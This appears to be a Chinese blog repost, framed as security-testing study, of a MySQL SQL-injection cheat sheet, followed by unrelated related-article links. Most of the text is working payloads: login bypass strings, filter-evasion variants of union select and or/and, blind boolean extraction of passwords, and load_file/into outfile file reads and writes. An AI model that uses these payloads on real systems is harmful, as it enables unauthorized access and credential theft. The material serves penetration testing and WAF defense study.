原文地址:http://websec.files.wordpress.com/2010/11/sqli2.pdf

0x00、介绍

也可以参考瞌腄龙的mysql注入科普:http://drops.wooyun.org/tips/123

很多东西都是一样的,但是有一些小技巧确实很使用。

以下所有技巧都只在mysql适用,因为它太灵活了

0x01 MYSQl灵活的语法

1 MySQL语法以及认证绕过

注释符:

#,

-- X(X为任意字符)

/*(MySQL-5.1)

;%00

'

'or 1=1;%00

'or 1=1 union select 1,2''

'or 1=1 #

'/*!50000or*/ 1=1 -- -      //版本号为5.1.38时只要小于50138

'/*!or*/ 1=1 -- -

前缀:

任意混合 + - ~ !

'or --+2=- -!!!'2

测试后发现and/or后面可以跟上偶数个!、~可以替代空格,也可以混合使用(混合后规律又不同),and/or前的空格可以省略

'or- -!!!1=1;

运算符:

^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……

'or 1 rlike '1

空格替换:%20, %09, %0a, %0b, %0c, %0d, %a0

也可以插入括号,前缀,操作符,引号

'or+(1)sounds/**/like"1"--%a0-

字符串格式

    ' or "a"='a'

    ' or 'a'=n'a'               //unicode

    ' or 'a'=b'1100001'         //binary

    ' or 'a'=_binary'1100001'   //5.5.41下测试无效

    ' or 'a'=x'61'              //16进制

2、MySQL常用的一些小工具

常量:true, false, null, \N, current_timestamp....

变量:@myvar:=1

系统变量:@@version, @@datadir....

常用函数:version(), pi(), pow(), char(), substring()....

3、MySQL类型转换

' or 1=true #true=1, false=0

' or 1 #true

' or version()=5.5 #5.5.41-log

' or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4

select * from users where 'a'='b'='c'

select * from users where ('a'='b')='c'

select * from users where (false)='c'

select * from users where (0)='c'

select * from users where (0)=0

select * from users where true

select * from users

以上的语句都是同样的效果

4、认证绕过

绕过语句:'='

select data from users where name="="

select data from users where flase="

select data from users where 0=0

绕过语句:'-'

select data from users where name=''-''

select data from users where name=0-0

select data from users where 0=0

0x02 关键字过滤

空格

过滤代码/\s/

%20, %09, %0a, %0b, %0c, %0d, %a0

关键字OR,AND

过滤代码/\sor\s/i,/\sand\s/i

'||1='1     #or

'='

'&&1='1     #and

关键字union select

过滤代码/union\s+select/i

'and(true)like(false)union(select(pass)from(users))#

'union [all|distinct] select pass from users#

'union%a0select pass from users#

'union/*!select*/pass from users#

/vuln.php?id=1 union/*&sort=*/select pass from users-- -

如果单独过滤union,使用盲注来获取数据

'and(select pass from users limit 1)='secret

通过子查询获取单值来进行比较

关键字limit

过滤代码/limit/i

'and(select pass from users where id=1)='a

'and(select pass from users group by id having id=1)='a

'and length((select pass from users having substr(pass,1,1)='a'))

关键字having

过滤代码/having/i

'and(select substr(group_concat(pass),1,1)from users)='a

关键字select ... from

过滤代码/SELECT\s+[A-Za-z.]+\s+FROM/i/i

select [all|distinct] pass from users

select'table_name'from'information_schema' . 'tables'

select pass as alias from users

select pass aliasalias from users

select pass'alias alias'from users

select+pass%a0from(users)

关键字select

过滤代码/select/i

1 有文件读取权限

' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+

length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt

2 获取列名

' and 列名 is not null#

' procedure analyse()#

使用substr来做过滤条件

'and substr(pass,1,1)='a

关键字select,and,&

'0#

select data from users where name = ''-0 # int typecast

select data from users where name = 0 # int typecast

select data from users where 0 = 0 # true

'-1#

select data from users where 0 = -1 # false

使用条件判断来进行true、false的选择

    ifnull(nullif()), case when, if()

    '-if(name='Admin',1,0)#

使用嵌套条件'-if(

if(name='Admin',1,0), // condition

if(substr(pass,1,1)='a',1,0) // if true

,0)# // if false

0x03 函数过滤

构建字符串相关函数

unhex char hex ascii ord substr substring mid pad left right insert

' and substr(data,1,1) = 'a'#

' and substr(data,1,1) = 0x61# 0x6162

' and substr(data,1,1) = unhex(61)# unhex(6162)

' and substr(data,1,1) = char(97)# char(97,98)

' and hex(substr(data,1,1)) = 61#

' and ascii(substr(data,1,1)) = 97#

' and ord(substr(data,1,1)) = 97#

使用conv来进行进制的转换

' and substr(data,1,1) = lower(conv(10,10,36))# 'a'

' and substr(data,1,1) = lower(conv(11,10,36))# 'b'

' and substr(data,1,1) = lower(conv(36,10,36))# 'z'

使用函数来猜解数据

' and substr(data,1,1) = 'a'#

' and substring(data,1,1) = 'a'#

' and mid(data,1,1) = 'a'#

不适用逗号来获取

' and substr(data from 1 for 1) = 'a'#

同样也可以使用一下比较少见的函数来尝试绕过

lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'

rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'

left(data,1)

reverse(right(reverse(data),1))

insert(insert(version(),1,0,space(0)),2,222,space(0))

有些函数有类似搜索匹配的功能

'-if(locate('f',data),1,0)#

'-if(locate('fo',data),1,0)#

'-if(locate('foo',data),1,0)#

instr(), position()

使用函数进行字符串的切割

length(trim(leading 'a' FROM data)) # length will be shorter

length(replace(data, 'a', '')) # length will be shorter

2种方式都是相同效果

0x04 注入时主要使用的一些东西

1个控制流程操作(select, case, if(), ...)

1个比较操作(=, like, mod(), ...)

1个字符串的猜解(mid(), left(), rpad(), …)

1个字符串生成(0x61, hex(), conv())

使用conv([10-36],10,36)可以实现所有字符的表示

false !pi()           0     ceil(pi()*pi())           10 A      ceil((pi()+pi())*pi()) 20       K

true !!pi()           1     ceil(pi()*pi())+true      11 B      ceil(ceil(pi())*version()) 21   L

true+true             2     ceil(pi()+pi()+version()) 12 C      ceil(pi()*ceil(pi()+pi())) 22   M

floor(pi())           3     floor(pi()*pi()+pi())     13 D      ceil((pi()+ceil(pi()))*pi()) 23 N

ceil(pi())            4     ceil(pi()*pi()+pi())      14 E      ceil(pi())*ceil(version()) 24   O

floor(version())      5     ceil(pi()*pi()+version()) 15 F      floor(pi()*(version()+pi())) 25 P

ceil(version())       6     floor(pi()*version())     16 G      floor(version()*version()) 26   Q

ceil(pi()+pi())       7     ceil(pi()*version())      17 H      ceil(version()*version()) 27    R

floor(version()+pi()) 8     ceil(pi()*version())+true 18 I      ceil(pi()*pi()*pi()-pi()) 28    S

floor(pi()*pi())      9     floor((pi()+pi())*pi())   19 J      floor(pi()*pi()*floor(pi())) 29 T

更多详细的东西可以参考原文去了解,还有一些其他的注入资料可以参考

http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf

https://media.blackhat.com/bh-us-12/Briefings/Ristic/BH_US_12_Ristic_Protocol_Level_Slides.pdf

http://www.blackhatlibrary.net/SQL_injection

http://websec.ca/kb/sql_injection

安全测试===Mysql 注入技巧学习 MySQL注入技巧(2)的更多相关文章

  1. Spring.NET依赖注入框架学习--简单对象注入

    Spring.NET依赖注入框架学习--简单对象注入 在前面的俩篇中讲解了依赖注入的概念以及Spring.NET框架的核心模块介绍,今天就要看看怎么来使用Spring.NET实现一个简单的对象注入 常 ...

  2. 安全测试===Mysql 注入技巧学习 MySQL注入技巧(1)

    默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) ...

  3. mysql存储过程的学习(mysql提高执行效率之进阶过程)

    1:存储过程: 答:存储过程是sql语句和控制语句的预编译集合,以一个名称存储并作为一个单元处理:存储过程存储在数据库内,可以由应用程序调用执行,而且允许用户声明变量以及进行流程控制,存储类型可以接受 ...

  4. Java工程师学习指南第7部分:重新学习MySQL与Redis

    本文整理了微信公众号[Java技术江湖]发表和转载过的Mysql和Redis相关优质文章,想看到更多Java技术文章,就赶紧关注本公众号吧吧. 大白话说说mysql 面试官:给我说说你平时是如何优化M ...

  5. MySQL 定时器EVENT学习

    原文:http://blog.csdn.net/lifuxiangcaohui/article/details/6583535 MySQL 定时器EVENT学习 MySQL从5.1开始支持event功 ...

  6. 重新学习MySQL数据库11:以Java的视角来聊聊SQL注入

    本文转自互联网 本系列文章将整理到我在GitHub上的<Java面试指南>仓库,更多精彩内容请到我的仓库里查看 https://github.com/h2pl/Java-Tutorial ...

  7. 【漏洞汇总】SQL 注入漏洞之 mysql

    日期:2019-07-23 19:55:59 更新:2019-08-02 10:40:37 作者:Bay0net 介绍:Mysql 注入笔记 0x01. 基本信息 1.1 基本术语 数据库: 数据库是 ...

  8. mysql的floor()报错注入方法详细分析

    刚开始学习sql注入,遇见了 select count(*) from table group by floor(rand(0)*2); 这么条语句.在此做个总结. (更好的阅读体验可访问 这里 ) ...

  9. 2019-9-10:渗透测试,基础学习,sql注入笔记

    sql注入1,万能密码,自己写的网站,找到登录窗口,必须和数据库交互,往里插入构造的恶意代码,最后可以直接登录进去,不需要账号和密码,输入的恶意代码成为万能密码,后端拼接的sql语句,SELECT * ...

随机推荐

  1. json格式化显示样式js代码分享

    最近开发中需要在页面展示json.特整理了下代码,送给大家,希望能帮到有同样需求的朋友们. 代码: <html> <script src="http://cdn.bootc ...

  2. 在阿里云上遇见更好的Oracle(四)

    2016.5.13,北京,第七届数据库技术大会. 从最初的itpub社区,到后来被it168收购,DBA社区的线下聚会发展成2010年第一届数据库技术大会(DTCC).第一届大会汇聚了社区内活跃的各位 ...

  3. 安装一台Linux练习机前的考虑——主机规划与磁盘分区

    要安装一台Linux主机并不是那么简单的事,我们必须要针对distributions的特性.服务器软件的能力.未来的升级需求.硬件扩充性需求等来考虑,对于磁盘分区.文件系统.Linux操作较频繁的目录 ...

  4. DFS实现模板

    以如下图的无向图G4为例,进行图的深度优先搜索: 假设从顶点v1出发进行搜索,在访问了顶点v1之后,选择邻接点v2.因为v2未曾访问,则从v2出发进行搜索.依次类推,接着从v4 .v8 .v5出发进行 ...

  5. cocos2d-x 显示中文字符和解析XML文件 转载

    源地址:http://codingnow.cn/cocos2d-x/1038.html 在cocos2d-x中直接显示中文的时候会出现乱码,虽然在实际开发中把字符串直接写在代码里也不是好的做法,但是有 ...

  6. java正则表达式 1 -- 符号

    正则表达式主要是用于操作字符串的规则 1 首先体验一下正则表达式: 需求:某个串只能是数字 传统方法: public class Demo2{ public static void main(Stri ...

  7. window下对samba的清理操作

    windows清除访问samba局域网密码缓存 1.在dos窗口中输入control userpasswords2或者control keymgr.dll,然后[高级]/[密码管理],删掉保存的该机器 ...

  8. Java中输入输出流

    InputStream:所有字节输入流的所有类的超类. read(byte[] b)从输入流中读取一定数量的字节,并将其存储在缓冲数组b中 reset()将此流重新定位到最后一次对此流调用mark方法 ...

  9. 在程序内部跳转到下一个页面 和 向另一个servlet发起跳转

    request.getRequestDispatcher("/success.html").forward(request,response); request.getReques ...

  10. hdu 2199 Can you solve this equation? (二分法)

    Can you solve this equation? Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K ( ...